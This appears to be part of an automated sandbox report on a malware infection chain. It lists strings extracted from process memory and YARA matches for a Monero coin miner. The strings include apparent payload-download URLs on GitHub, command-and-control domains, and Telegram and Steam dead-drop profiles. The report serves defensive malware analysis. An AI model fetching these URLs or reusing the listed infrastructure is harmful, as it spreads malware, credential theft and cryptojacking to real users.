Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop/
Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop/#
Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop//
Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop/0
Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop/7
Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2849408040.00000000007A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop/C
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/G
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/K
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2872982174.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/O
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/W
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/d$
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/g
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2849408040.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/rosoft
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2849408040.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/saenh.dll
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2824507847.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2801209203.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2775102059.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/u%
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2923711164.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2898848742.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/w
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6ACD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002D.00000003.2733073587.000001EE6AD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
                      Source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe
                      Source: 77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: powershell.exe, 00000020.00000002.2598419733.0000000006387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6ACD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/biyjdfjadaw.exe
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/ktyihkdfesf.exe
                      Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comD
                      Source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store-im.pXu
                      Source: 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: 77594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: 77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: 77594b3442.exe, 00000031.00000003.2968639998.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2942066458.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2970465845.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941963499.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968949040.00000000052FA000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3191808258.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: 77594b3442.exe, 00000031.00000003.2942066458.00000000052D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/0
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/Iu
                      Source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.000000000079D000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aell
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720818695.0000000000423000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/p
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745170967.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: 77594b3442.exe, 00000031.00000003.3014208025.000000000565E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                      Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                      Source: 9d4ddc637a.exe, 0000003A.00000003.3173171015.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3173955465.0000000001666000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000002.3185990259.0000000001666000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3155290607.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                      System Summary

                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                      Source: 9d4ddc637a.exe, 0000003A.00000002.3176645675.0000000000EA2000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d9d32420-5
                      Source: file.bin.7.drZip Entry: encrypted
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: skotes.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.0.drStatic PE information: section name: .idata
                      Source: 513dad5c05.exe.5.drStatic PE information: section name:
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: .idata
                      Source: ce29828af5.exe.5.drStatic PE information: section name:
                      Source: ce29828af5.exe.5.drStatic PE information: section name: .idata
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: random[3].exe.5.drStatic PE information: section name: .idata
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name: .idata
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name: .idata
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name: .idata
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: .idata
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name: .idata
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name: .idata
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name: .idata
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name: .idata
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name: .idata
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: random[2].exe1.5.drStatic PE information: section name:
                      Source: random[2].exe1.5.drStatic PE information: section name: .idata
                      Source: random[2].exe2.5.drStatic PE information: section name:
                      Source: random[2].exe2.5.drStatic PE information: section name: .idata
                      Source: 7d28d37061cb43098969a37cf25a380a.exe.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D96AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,11_2_001D96AC
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.job
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002149A511_2_002149A5
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002099B811_2_002099B8
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002079DC11_2_002079DC
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DA3011_2_0021DA30
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0020FA0C11_2_0020FA0C
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DC1111_2_0021DC11
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E7C6811_2_001E7C68
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E8CA811_2_001E8CA8
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DD0011_2_0021DD00
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F6E0811_2_001F6E08
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D8F1811_2_001D8F18
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001EAF5811_2_001EAF58
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeCode function: 15_2_02B02E6015_2_02B02E60
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeCode function: 15_2_02B02EB715_2_02B02EB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037BB4A032_2_037BB4A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037BB49032_2_037BB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037B1D6A32_2_037B1D6A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_037B1D1832_2_037B1D18
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_0378B49040_2_0378B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_0378C66240_2_0378C662
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_03781D0840_2_03781D08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_08F23E9840_2_08F23E98
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAA9A6844_2_00007FFD9BAA9A68
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAAA7D044_2_00007FFD9BAAA7D0
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAB2FC944_2_00007FFD9BAB2FC9
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAB035744_2_00007FFD9BAB0357
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAA5B2144_2_00007FFD9BAA5B21
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAA28FA44_2_00007FFD9BAA28FA
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BAAB06744_2_00007FFD9BAAB067
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 000680C0 appears 130 times
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 007080C0 appears 130 times
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
